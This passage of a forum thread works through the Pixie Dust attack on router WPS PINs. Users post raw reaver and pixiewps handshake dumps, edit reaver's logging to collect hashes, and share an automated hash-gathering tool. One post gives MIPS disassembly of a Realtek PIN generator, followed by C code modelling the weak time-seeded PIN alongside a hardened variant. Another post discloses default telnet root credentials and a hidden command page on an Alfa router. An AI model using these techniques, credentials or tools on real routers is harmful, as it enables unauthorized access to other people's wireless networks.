    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] PKR: f2:60:5d:f8:f9:f6:51:7b:50:12:9d:96:2d:67:45:96:40:57:9b:65:54:b0:37:45:c7:4d:e8:8b:0b:ee:4e:8a:c0:74:6c:15:e6:26:8b:a8:b2:e3:9b:61:29:c9:26:83:a7:35:2b:e2:84:e3:e3:6c:d5:40:a0:5e:49:37:66:95:4a:a8:9d:c2:e0:cd:7e:72:ac:52:48:1b:86:bb:47:9b:f9:d9:c8:b2:4b:12:0b:58:35:f1:2e:93:48:fa:38:2e:9c:5e:cd:a4:be:ba:f2:cf:e7:e0:e4:ba:bb:20:12:f1:c4:a0:8a:9c:02:ed:54:ac:26:a0:25:9a:b5:55:ad:92:ef:07:a8:09:c4:f1:38:36:c5:65:8c:98:70:cd:3e:ac:4f:76:79:90:64:f2:55:59:8e:8c:76:95:15:51:28:7d:f7:b8:b7:01:10:f4:48:a2:84:b1:20:f1:90:4a:4b:c8:af:23:58:de:5d:64:12:e8:ab:35:46:f2:4b:00:bb:3c
    [P] AuthKey: 57:0f:2c:2d:b9:96:9a:ca:96:07:fd:86:c3:f2:b2:cd:7d:27:9b:d3:b4:a5:5b:89:65:62:3a:8a:51:a8:74:57
    [P] E-Hash1: 2e:c6:22:b4:6e:cf:d7:cb:ec:bf:b1:bc:d1:91:76:75:a6:6a:84:52:3c:55:48:b1:cf:e2:27:da:e8:0c:c5:70
    [P] E-Hash2: e6:28:3f:35:de:2d:a3:bd:4a:88:bc:2b:27:fa:24:22:58:0b:b9:ca:83:ba:75:dc:dd:6c:aa:81:5e:ce:61:e4
    AND HERE:

    Code:
    [P] E-Nonce: 10:7b:c3:b1:65:cd:d7:fb:75:48:55:18:1c:3e:00:fc
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] PKR: cf:bc:97:7a:fe:b1:27:2c:4e:95:da:d1:92:87:01:70:8d:e3:f1:cc:f8:6c:1d:e6:26:23:c9:62:67:e0:37:71:8b:77:8b:c1:f4:ce:12:7b:f9:fb:0f:27:6f:78:99:77:27:2b:70:ce:b5:c9:41:d3:dd:07:d8:78:fc:d7:7d:45:2d:b9:f5:e2:33:40:67:20:66:68:12:0f:66:b3:bd:8b:e9:4e:57:f5:ca:ea:91:11:7a:fb:2c:bd:05:f5:59:ec:4e:5e:10:a5:04:20:59:bd:04:c5:6c:d1:28:7c:03:e5:c2:5c:ec:15:b9:98:e0:65:e8:07:2e:3f:f0:b7:05:29:a9:ad:a5:c6:f8:1c:a5:30:f0:1b:ea:d2:bb:23:c7:1b:e3:b4:0e:dd:65:a9:d2:98:4d:e8:28:bd:fa:ba:fe:dc:66:b5:ed:28:86:e1:59:97:f9:d9:4a:93:1f:fe:cb:86:30:c4:12:54:a1:cf:16:dc:e8:5d:9e:15:aa:a5:6c:bf
    [P] AuthKey: 3c:1c:17:cb:bf:d0:e9:c0:95:c2:ef:64:04:64:c6:94:0a:c3:45:7d:f3:66:89:1e:69:9e:4f:a2:d0:6c:a3:6b
    [P] E-Hash1: 24:ba:d7:f0:b9:7e:24:ae:f8:57:28:13:26:61:56:3d:67:6e:02:2f:8d:50:df:74:89:53:50:91:70:e9:b1:64
    [P] E-Hash2: a6:ad:3b:e8:e0:ed:1c:06:9c:cc:4b:0b:f1:79:b6:af:f5:69:ef:97:ca:78:1e:01:68:1d:22:54:6f:57:d4:f1
    /\/\

    NOT VULNERABLE:

    Linksys WRT120n
    Atheros AR9285

    Code:
    [P] E-Nonce: 6f:e3:4f:8b:e4:83:08:41:8d:5e:b8:98:cc:71:f2:8f
    [P] PKE: f3:d3:80:1b:b8:f7:00:01:74:bb:3f:8d:dc:bc:17:ee:5f:e1:0e:c5:c3:ad:23:43:29:ad:b6:bc:7b:97:84:86:a2:ed:20:f9:5a:a6:72:64:1d:51:b9:da:7b:5d:e8:34:9b:a3:36:05:f1:6c:c4:8c:54:37:74:ed:d3:36:9e:e4:cc:08:e4:92:c6:ed:0f:e1:f1:c4:b8:36:bb:9d:03:97:01:89:ff:62:ce:2e:3f:38:1e:8d:fb:f1:85:9d:af:b5:16:99:ad:51:d5:03:d8:c3:77:f2:00:8c:7e:02:09:77:ef:31:58:33:13:da:3e:35:b4:67:77:ff:04:60:5f:fe:e5:0b:ff:a2:e3:fd:06:86:c1:b7:f8:bd:1b:a5:d9:45:c7:e4:d2:8e:20:99:66:4b:b3:62:0d:66:cc:ed:11:6b:d8:5c:fb:7b:1f:46:c9:7c:ae:e1:00:f1:e9:70:6b:69:22:bf:19:d8:e7:42:67:30:61:cb:f6:ad:9e:4e:44:84
    [P] PKR: c5:b0:0a:28:4d:ba:ad:2f:05:ce:53:76:fa:fc:98:32:4a:ff:75:59:22:6e:06:aa:1f:15:be:48:bc:44:55:66:98:ea:a0:9d:d3:81:bd:df:53:55:6a:55:f0:68:63:1c:6a:b5:53:5a:3a:a6:5a:12:54:1f:82:4a:f0:7e:1a:9c:15:96:dd:0c:7b:e1:fa:ea:c1:e8:cc:5f:e0:0b:24:47:ee:1e:a8:84:d1:06:80:ea:e3:24:ac:40:66:29:7c:ae:79:66:42:00:c8:82:4a:b1:c9:a4:3a:04:34:b6:42:dc:4a:81:79:c1:40:c6:95:80:ff:75:60:2a:1a:62:da:a6:b2:c4:68:19:56:77:1f:0a:70:22:fe:3a:76:ac:ba:1d:9d:5b:2d:12:6b:a5:d5:18:7a:bb:5a:d4:3f:f2:59:6f:ca:f6:2b:5b:3b:f8:f1:92:e2:a7:57:4e:f5:f0:7a:a3:31:6d:6b:52:2a:85:84:71:51:c0:b2:11:7d:db:fc:15
    [P] AuthKey: 81:fd:7e:7a:3a:53:76:0b:65:f9:1e:e9:fb:a1:1a:89:c4:98:b3:57:cb:1f:60:69:52:4e:6d:dc:2b:1f:6b:b2
    [P] E-Hash1: a6:e9:dc:2d:19:d6:fe:e8:39:32:d9:83:69:b5:25:49:79:b8:70:27:4d:9b:b4:a1:93:e4:17:0c:36:9e:a0:fe
    [P] E-Hash2: b7:73:33:9d:69:d8:d0:e0:fe:5c:1c:b1:a6:8c:41:a4:61:5e:57:3b:d0:92:86:96:e2:db:f5:e7:bf:56:fa:c5
    NOT VULNERABLE:

    D-Link 615 B2
    Atheros AR5416/Atheros AR2122


    Code:
    [P] E-Nonce: 6e:e4:ae:67:c5:46:86:65:6d:ab:0a:c9:90:2a:89:cb
    [P] PKE: e2:4b:6c:da:3b:c9:9c:0a:1f:97:52:69:d4:55:2a:5e:85:fb:35:bd:f8:d1:47:a3:d3:53:5e:28:b8:ca:74:8f:0c:c2:8d:4c:18:f8:52:16:54:ee:da:bf:1d:c3:c4:15:a4:0d:24:96:a9:95:b2:28:d7:ec:a2:87:f8:b4:70:24:fc:aa:c7:33:bb:fd:b2:e8:ef:7a:df:07:70:d6:df:2c:8b:dd:d1:3b:f7:fa:1d:cc:53:35:a4:99:d8:77:41:dd:2e:7e:c4:2a:37:4d:6d:59:90:f5:ed:30:d7:93:82:cf:22:2b:9d:95:08:3d:cc:bf:cd:78:99:66:ac:a8:81:7f:32:33:63:ae:b6:16:f1:d4:e1:10:3f:08:64:f8:86:72:da:c6:97:53:f0:c7:07:c4:0e:2c:c7:48:30:cc:0b:f0:ba:27:8d:5c:39:4d:68:cd:3c:b3:19:13:03:7a:be:4d:b1:19:bd:f0:83:f8:40:88:82:c9:ee:94:7a:43:8d:2f
    [P] PKR: 15:e1:31:80:df:2b:44:9a:9a:21:58:00:42:75:e9:22:23:ea:96:66:04:e0:0c:12:96:20:a4:51:55:59:2f:ac:ad:bf:e5:c6:60:30:3e:fd:fa:62:b0:cd:f9:26:e7:2a:c7:69:80:97:ce:f0:ec:6d:03:bb:c5:d2:44:f1:d4:bd:88:be:8f:e2:e7:69:42:10:21:9d:8d:da:d6:d9:58:c7:48:8c:80:4c:25:76:c4:d8:5b:6d:25:8d:d1:1e:08:ab:10:2b:c0:73:af:7e:a6:c0:0f:8c:4c:61:54:8f:11:fc:18:51:e5:af:62:c8:19:12:2e:6e:84:0f:35:ad:9b:d6:21:f7:31:f1:00:6e:55:df:5b:ac:67:cd:1a:36:7c:14:de:f6:e1:01:14:d1:e5:88:78:6c:9a:7a:0e:24:bb:b1:82:97:c9:06:1b:66:7f:50:41:d6:e6:80:e3:28:a7:b9:47:1b:1e:cf:0b:92:da:f8:50:92:94:de:fa:2e:6c:82
    [P] AuthKey: 68:4a:a0:f1:48:81:32:6a:ec:22:e7:2d:4a:ff:4c:97:42:6c:f4:5c:1c:78:2f:05:73:bd:d4:e3:eb:9b:3a:e4
    [P] E-Hash1: 2e:dc:77:bf:39:09:1a:44:a4:1d:45:28:12:64:c1:7d:ca:9e:f4:40:89:44:05:14:10:32:dc:b5:f7:73:24:c3
    [P] E-Hash2: 26:4f:77:c9:c9:3e:34:a3:80:c4:07:b8:83:2a:66:a2:51:04:cd:e6:0f:6a:97:7a:4f:21:37:81:51:04:1e:1f

  34. #34
    Join Date
    2015-Mar
    Posts
    127
    1. Which is the best tool for automated hash collection? Something we could use to gather hashes to send off for analysis, possibly find new holes for pixiewps.

    2. Are hashes from locked routers corrupt, no good for analysis?

    3. Also any update on Realtek attack?

  35. #35
    1.
    The best way is simply to save a *.cap file with the PROBES and M messages and to add a *.txt file with the output of modified reaver.
    In case the chipset and/or the model/manufacturer doesn't appear fully/directly in the probes/stdout of modified reaver, please add this information manually.

    2.
    They are not corrupted but you need to get m1-m2 and m3 and you will not get this full sequence on a locked router (until it is unlocked again).

    3.
    Do you know how to "disassemble" firmware? I am stuck and need some help. I found something very interesting on unsupported Realtek, in parts that can be disassembled easily with binwalk from Craig Heffner.
    Basically there is a little *.sh script on startup that generates 4 things (or checks if these four things have been generated correctly and generates them if that's not the case) and one of them is the default WPS PIN.
    On these devices the PIN is permanent/unconfigurable.
    Help would be appreciated.

  36. #36
    Join Date
    2015-Apr
    Posts
    15
    Quote Originally Posted by kcdtv View Post
    3.
    Do you know how to "disassemble" firmware? I am stuck and need some help. I found something very interesting on unsupported Realtek, in parts that can be disassembled easily with binwalk from Craig Heffner.
    Basically there is a little *.sh script on startup that generates 4 things (or checks if these four things have been generated correctly and generates them if that's not the case) and one of them is the default WPS PIN.
    On these devices the PIN is permanent/unconfigurable.
    Help would be appreciated.
    Hi,
    Got the firmware, unpacked it with fmk, checked it with IDA Pro.
    Found this function in wscd (it's the "gen-pin" function from the .sh script), but I'm not that good at MIPS. The (in my opinion) important parts are marked; maybe someone who's familiar with MIPS can say something about it.

    Code:
    LOAD:0040C4C4                 la      $t9, gettimeofday
    LOAD:0040C4C8                 move    $a1, $zero
    LOAD:0040C4CC                 jalr    $t9 ; gettimeofday
    LOAD:0040C4D0                 addiu   $a0, $sp, 0xF0+var_68
    LOAD:0040C4D4                 lw      $gp, 0xF0+var_D8($sp)
    LOAD:0040C4D8                 lw      $a0, 0xF0+var_68($sp)
    LOAD:0040C4DC                 la      $t9, srand
    LOAD:0040C4E0                 nop
    LOAD:0040C4E4                 jalr    $t9 ; srand
    LOAD:0040C4E8                 nop
    LOAD:0040C4EC                 lw      $gp, 0xF0+var_D8($sp)
    LOAD:0040C4F0                 nop
    LOAD:0040C4F4                 la      $t9, rand
    LOAD:0040C4F8                 nop
    LOAD:0040C4FC                 jalr    $t9 ; rand
    LOAD:0040C500                 nop
    LOAD:0040C504                 li      $v1, 0x6B5FCA6B
    LOAD:0040C50C                 mult    $v0, $v1
    LOAD:0040C510                 sra     $a0, $v0, 31
    LOAD:0040C514                 lw      $gp, 0xF0+var_D8($sp)
    LOAD:0040C518                 nop
    LOAD:0040C51C                 la      $t9, 0x400000
    LOAD:0040C520                 nop
    LOAD:0040C524                 addiu   $t9, (sub_404128 - 0x400000)
    LOAD:0040C528                 mfhi    $v1
    LOAD:0040C52C                 sra     $v1, 22
    LOAD:0040C530                 subu    $a1, $v1, $a0
    LOAD:0040C534                 sll     $a0, $a1, 5
    LOAD:0040C538                 subu    $a0, $a1
    LOAD:0040C53C                 sll     $v1, $a0, 6
    LOAD:0040C540                 subu    $v1, $a0
    LOAD:0040C544                 sll     $v1, 3
    LOAD:0040C548                 addu    $v1, $a1
    LOAD:0040C54C                 sll     $a0, $v1, 2
    LOAD:0040C550                 addu    $v1, $a0
    LOAD:0040C554                 sll     $v1, 7
    LOAD:0040C558                 subu    $a1, $v0, $v1
    LOAD:0040C55C                 sll     $s0, $a1, 2
    LOAD:0040C560                 move    $a0, $a1
    LOAD:0040C564                 jalr    $t9 ; sub_404128
    LOAD:0040C568                 addu    $s0, $a1
    LOAD:0040C56C                 lw      $gp, 0xF0+var_D8($sp)
    LOAD:0040C570                 sll     $s0, 1
    LOAD:0040C574                 addu    $a0, $s0, $v0
    LOAD:0040C578                 la      $t9, 0x400000
    LOAD:0040C57C                 nop
    LOAD:0040C580                 addiu   $t9, (sub_403F60 - 0x400000)
    LOAD:0040C584                 jalr    $t9 ; sub_403F60
    LOAD:0040C588                 addiu   $a1, $sp, 0xF0+var_D0
    LOAD:0040C58C                 lw      $gp, 0xF0+var_D8($sp)
    LOAD:0040C590                 addiu   $a1, $sp, 0xF0+var_D0
    LOAD:0040C594                 la      $a0, 0x440000
    LOAD:0040C598                 la      $t9, printf
    LOAD:0040C59C                 nop
    LOAD:0040C5A0                 jalr    $t9 ; printf
    LOAD:0040C5A4                 addiu   $a0, (aPinS - 0x440000)  # "PIN: %s\n"
    LOAD:0040C5A8                 lw      $gp, 0xF0+var_D8($sp)
    LOAD:0040C5AC                 li      $a0, 0xADAC
    LOAD:0040C5B0                 addu    $a0, $s2, $a0
    LOAD:0040C5B4                 la      $t9, strcpy
    LOAD:0040C5B8                 b       loc_40C8C0
    LOAD:0040C5BC                 addiu   $a1, $sp, 0xF0+var_D0
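
What the listing above appears to compute, written out in C beside a hardened variant, as an added example that is not part of the original post or of the firmware: the seconds from gettimeofday() seed srand(), rand() is reduced modulo 10,000,000 (the 0x6B5FCA6B multiply, the shift by 22 and the shift/add chain are the compiler's form of that modulo), and ten times the result plus the return value of sub_404128 becomes the PIN. Assumptions: sub_404128 is taken to be the standard WPS checksum digit, and all function names below are invented for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

#define PIN7_RANGE 10000000u   /* 7 free digits; the 8th digit is a checksum */

/* Standard WPS checksum digit over the first 7 digits of a PIN
 * (assumed to be what sub_404128 returns in the listing). */
unsigned wps_checksum(unsigned pin7)
{
    unsigned accum = 0;
    while (pin7) {
        accum += 3 * (pin7 % 10);
        pin7 /= 10;
        accum += pin7 % 10;
        pin7 /= 10;
    }
    return (10 - accum % 10) % 10;
}

/* Returns 1 if an 8-digit PIN carries a correct checksum digit. */
int wps_pin_valid(unsigned pin8)
{
    return pin8 < 100000000u && wps_checksum(pin8 / 10) == pin8 % 10;
}

/* Weak pattern from the listing: srand(seed); rand() % 10^7; append checksum.
 * In the firmware the seed is the tv_sec value filled in by gettimeofday(),
 * so the PIN is a pure function of the second in which it was generated.
 * The numeric result depends on the host libc's rand(); only the structure
 * is modelled here. */
unsigned pin_time_seeded(unsigned seed)
{
    unsigned pin7;
    srand(seed);
    pin7 = (unsigned)rand() % PIN7_RANGE;
    return pin7 * 10 + wps_checksum(pin7);
}

/* Hardened variant: take the 7 digits from the kernel CSPRNG and use
 * rejection sampling so every value in [0, 10^7) is equally likely.
 * Returns 0 on success, -1 if /dev/urandom cannot be read. */
int pin_from_csprng(unsigned *out)
{
    FILE *f = fopen("/dev/urandom", "rb");
    uint32_t r;
    unsigned pin7;

    if (!f)
        return -1;
    do {
        if (fread(&r, sizeof r, 1, f) != 1) {
            fclose(f);
            return -1;
        }
    } while (r >= 429u * PIN7_RANGE);   /* 4,290,000,000: largest multiple of 10^7 below 2^32 */
    fclose(f);

    pin7 = r % PIN7_RANGE;
    *out = pin7 * 10 + wps_checksum(pin7);
    return 0;
}

int main(void)
{
    unsigned seed = 1430000000u;   /* constructed sample seed (a Unix time in seconds) */
    unsigned strong;

    /* Equal seeds give equal PINs: the PIN holds no more entropy than the clock. */
    printf("time-seeded, same seed twice: %08u %08u\n",
           pin_time_seeded(seed), pin_time_seeded(seed));

    if (pin_from_csprng(&strong) == 0)
        printf("CSPRNG-derived:               %08u\n", strong);
    return 0;
}
```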

  37. #37
    Quote Originally Posted by kcdtv View Post
    1.
    The best way is simply to save a *.cap file with the PROBES and M messages and to add a *.txt file with the output of modified reaver.
    In case the chipset and/or the model/manufacturer doesn't appear fully/directly in the probes/stdout of modified reaver, please add this information manually.

    2.
    They are not corrupted but you need to get m1-m2 and m3 and you will not get this full sequence on a locked router (until it is unlocked again).

    3.
    Do you know how to "disassemble" firmware? I am stuck and need some help. I found something very interesting on unsupported Realtek, in parts that can be disassembled easily with binwalk from Craig Heffner.
    Basically there is a little *.sh script on startup that generates 4 things (or checks if these four things have been generated correctly and generates them if that's not the case) and one of them is the default WPS PIN.
    On these devices the PIN is permanent/unconfigurable.
    Help would be appreciated.
    Hello kcdtv,

    I have the same kind of model you posted, an Alfa Network AIP-W525H (version 1) with firmware v2.5.2.a1. Just to tell you that you can change this "permanent" WPS pin, and not only that but also change the MAC address. There are 2 ways to do it:
    - you can issue commands over telnet 192.168.2.1 23 login as root and 5up as pass
    - you can issue commands over web on a hidden page http://192.168.2.1/syscmd.asp

    Indeed there's the wscd command that allows you to generate and assign pins with arguments like -gen-pin, generate pin code for local entitiy (it's misspelled in the source code); -peer_pin, assign pin code for peer entitiy; -local_pin, assign pin code for local device

    With wscd -gen-pin you can generate pins randomly, but there's other command tool named flash (like nvram) that stores values permanently over reboots:

    // get WPS pin
    # flash get wlan0 HW_WSC_PIN
    HW_WSC_PIN="77756886"

    // generate a "random" WPS pin
    # flash -gen-pin

    // save a new pin manually for instance 88884444 (reboot afterwards to take effect)
    # flash set wlan0 HW_WSC_PIN 88884444

    // change mac address permanently on wlan0
    # flash set wlan0 HW_WLAN_ADDR 00c0ca1c2014

    // change mac address temporarily (until reboot) on wlan0 (to take effect do >> ifconfig wlan0 down && ifconfig wlan0 up)
    # ifconfig wlan0 hw ether 00c0ca111111

    About that pin generator -gen-pin I did find stuff over some extracted files from firmware, but I missed some stuff that I need to extract again cause it was long ago and over telnet I saw more info.

    Did you have a look at the source code over this web page http://192.168.2.1/wlwps.asp?
    There's a function genPinClicked() maybe it will help to look it up.

    Congrats everyone for your efforts
    Last edited by reversetheg@p; 2015-04-29 at 15:58. Reason: duplicated quote

  38. #38
    Join Date
    2015-Mar
    Posts
    127
    The best way is simply to save a *.cap file with the PROBES and M messages
    Gonna take a look at wireshark, try and figure it out.
    kcdtv, appreciate the responses -very interesting.

    Hope someone is developing a tool to automate the process, for noobs. If made easy for noobs like me, we can help build the data collection pool.

  39. #39
    Join Date
    2015-Apr
    Posts
    15
    I use a modified reaver-src. If I set the -o $logfile switch, reaver writes only the pixie data to the logfile.

    For AuthKey make the following changes:

    change:
    Code:
    wps_common.c:    printf("[P] AuthKey: ");
    to:
    Code:
    wps_common.c:    cprintf(VERBOSE, "[P] AuthKey: ");
    and add a new line in wps_common.c (under #include "wps_dev_attr.h") with:
    Code:
    #include "../misc.h"
    And for messages you don't need (here the M1 received message),
    replace:
    Code:
    exchange.c:                cprintf(VERBOSE, "[+] Received M1 message\n");
    with:
    Code:
    exchange.c:                printf("[+] Received M1 message\n");
    I'll search with grep for all reaver messages, and change everything which is not important for the output file.
    Not the perfect way, but it works.
    Last edited by someone_else; 2015-04-26 at 15:21.

  40. #40
    Join Date
    2015-Feb
    Posts
    6
    I do have a fork of autopixiewps I modified a while back that does hash collection, and then also produces a shell script. I'll update my fork in my GitHub repo (GitHub user name: d8tahead).

    It saves generic reaver output of model info, collects hashes, and produces a shell script for the corresponding hashes with pixiewps, and gives each segment an ID#.

    edit:
    The one in my repo is a little old, I'll update it soon

    will post asap

    Edit #2:

    I had to strip out some things from the code, but it should still work fine

    autopixie has been updated in my repo:
    https://github.com/d8tahead/AutoPixieWps

    and you will need the new reaver t6x fork (I added the addition of R-Nonce for future pixiewps):
    https://github.com/t6x/reaver-wps-fork-t6x

    For my fork of autopixiewps, for the hash gathering you will need to enable option #5 on the main menu before the wash scan (pixiehash gathering mode).

    Also please note that the logs will be saved as essid and bssid with the prefix of PixieHash in the executing directory!
    So be sure to cd to whichever directory you would like the hashes to be saved in if executing from a shell.

    Remember to make autopixiewps.py executable!
    Last edited by datahead; 2015-04-27 at 05:41.

  41. #41
    Join Date
    2015-Apr
    Posts
    5
    After your last update reaver doesn't work: pixiewps: invalid option -- 'm'

  42. #42
    Join Date
    2015-Apr
    Posts
    29
    Quote Originally Posted by aboulatif View Post
    After your last update reaver doesn't work: pixiewps: invalid option -- 'm'
    I have the same problem.
    What's wrong?

  43. #43
    ISSUE: ??

    I looked at all the pixie test posts in this thread... Some modems are invulnerable because the manufacturer and WPS model numbers are FALSE!

    Example:

    WPS manufacturer: TPLINK
    WPS model number: 1

    TP-Link uses Realtek and Atheros chipsets...

    True value:

    WPS manufacturer: Atheros
    WPS model number: WR740..

    Other example:

    WPS manufacturer: Realtek Semiconductor,
    WPS model number: EV-2006-07-27...

    The model number is not "EV-2006-07-27"; true value: RTL8671

  44. #44
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by Saydamination View Post
    ISSUE: ??

    I looked at all the pixie test posts in this thread... Some modems are invulnerable because the manufacturer and WPS model numbers are FALSE!

    Example:

    WPS manufacturer: TPLINK
    WPS model number: 1

    TP-Link uses Realtek and Atheros chipsets...

    True value:

    WPS manufacturer: Atheros
    WPS model number: WR740..

    Other example:

    WPS manufacturer: Realtek Semiconductor,
    WPS model number: EV-2006-07-27...

    The model number is not "EV-2006-07-27"; true value: RTL8671
    It is not a problem with reaver, it is just how the AP is configured. You will see the same thing in Wireshark if you look.

  45. #45
    Quote Originally Posted by soxrok2212 View Post
    It is not a problem with reaver, it is just how the AP is configured. You will see the same thing in Wireshark if you look.
    Hi, soxrok... I see the APs in Wireshark... And there is a problem... Pixie sees wrong values... Look at the screenshots...

    Code:
    Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 07:34:36:3e:4a:0e:38:df:e7:cd:fa:15:85:92:9e:71
    [P] PKE: 0d:da:3b:db:55:f3:68:cf:55:2b:98:93:18:0a:f4:77:28:58:3d:45:25:58:0a:35:f0:5c:b3:89:7e:3e:3a:f9:dc:49:0a:dd:7f:f0:bb:61:3d:20:8a:fb:d7:d7:17:d0:fa:94:ad:26:5a:8d:70:9e:a1:3c:7f:cb:69:9c:a1:a7:f7:b5:d7:bf:6b:d4:fb:7c:e4:51:fb:f9:6b:9c:ef:5b:94:6c:7d:7a:4e:40:11:49:83:3d:bb:84:2a:cc:23:f9:3c:63:7f:af:70:4b:28:33:ea:f5:f5:05:38:19:76:09:8c:6a:8b:37:9e:27:ec:63:96:c1:f4:ab:23:27:d9:57:30:3b:b9:9d:55:e9:76:5d:81:5c:07:b4:8c:90:0c:02:37:9c:2f:f7:2d:6f:5b:b2:a0:4f:ee:9a:88:a1:1f:f4:3f:bd:78:6f:d5:8a:48:6f:fe:c7:b7:c2:da:9e:68:b8:35:0e:3e:e5:f3:4d:e1:4b:5f:b0:08:c9:d4:9e:a7:93
    [P] WPS Manufacturer: AirTies Wireless Networks
    [P] WPS Model Number: 1.0.2.0
    [P] Access Point Serial Number: AT1731434014674
    [+] Received M1 message
    [P] PKR: 07:a0:3b:9f:28:60:17:1f:38:52:9e:7e:0b:5f:ef:04:62:15:b6:86:05:cb:4b:ee:f4:64:4f:a1:fd:35:da:3e:54:a6:26:c7:93:2a:b5:00:1c:e7:81:37:58:e8:ec:d1:fb:08:3a:f3:44:53:64:a1:41:02:25:ed:41:87:a5:85:aa:c6:98:87:7c:41:8f:a0:e6:96:0b:52:b3:bf:18:05:00:18:16:f0:4c:12:41:e1:bc:ca:e5:12:d0:67:2a:99:cb:04:2f:bb:21:22:9b:99:38:13:5b:ed:44:52:4e:f8:35:81:9f:98:63:f7:98:d9:6a:6f:a2:e8:3b:71:13:cd:e4:6a:b9:3e:51:d2:43:7f:a1:eb:7f:6a:74:5b:06:b2:29:55:5e:c9:27:36:a9:d7:1a:e0:3e:78:35:63:68:33:10:8c:44:64:96:86:96:03:74:d8:59:df:47:03:26:e3:5c:5b:93:18:ac:71:39:29:c5:4e:98:ef:3e:77:73:6a
    [P] AuthKey: 99:58:17:50:f0:15:e3:c8:aa:75:c0:0f:fe:47:d7:b8:e8:f7:bf:af:9d:8a:64:91:74:1c:6f:36:21:1d:72:d5
    [+] Sending M2 message
    [P] E-Hash1: 80:3f:98:56:4f:6c:f7:64:bf:e9:39:9a:d9:39:24:04:7b:b4:84:44:48:81:6a:6b:e3:ba:c5:ee:86:c5:d1:32
    [P] E-Hash2: 79:d2:d0:6a:0e:12:82:d8:ae:9f:32:aa:21:95:07:ef:45:12:78:a6:ba:60:c2:aa:24:a2:db:b2:ca:51:8b:bb
    [Pixie-Dust]  
    [Pixie-Dust]   [-] WPS pin not found!
    [Pixie-Dust]  
    [Pixie-Dust][*] Time taken: 2 s
    [Pixie-Dust]
    http://imgur.com/XslVDB6

    Code:
    Trying pin 12345670.
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 6a:34:66:5e:16:2c:db:cb:5b:11:f7:cc:78:a3:a0:c9
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: Realtek Semiconductor Corp.
    [P] WPS Model Number: EV-2006-07-27
    [P] Access Point Serial Number: 123456789012347
    [+] Received M1 message
    [P] PKR: 19:fc:9c:fb:93:99:c3:5b:96:d8:d1:71:92:2e:64:89:85:5e:b8:c2:51:cc:f0:3d:e5:87:ef:8a:4d:5b:fd:63:bb:4d:ac:1d:d5:fd:ec:a6:ab:f2:35:80:33:bc:c9:61:4f:f5:6b:51:ce:1c:64:dd:c8:e2:a2:aa:98:5d:b0:8c:fe:90:1f:db:fb:a1:13:ec:55:29:4f:3e:49:3a:80:62:4d:fe:77:9e:6e:78:25:5f:5d:30:8f:34:20:2a:28:82:2f:08:23:af:86:79:29:1c:be:e8:75:af:c8:a7:e9:90:52:2a:15:cd:49:21:c0:00:62:91:3e:1e:94:11:55:92:28:54:81:89:f9:af:99:b8:f4:7a:29:80:0a:92:69:18:63:97:5f:85:73:51:af:9b:63:fb:a3:dc:0e:7d:eb:2b:23:3d:8b:4f:50:e5:eb:9b:bc:7e:d6:2b:21:93:09:52:6b:8a:71:d0:33:31:6c:82:01:f3:ee:85:77:97:2c:ae
    [P] AuthKey: 2b:da:97:bc:a7:06:a8:e9:94:6e:ff:f3:70:e3:84:8d:ec:48:ad:b0:ba:49:74:6b:a0:31:93:db:ac:71:9a:09
    [+] Sending M2 message
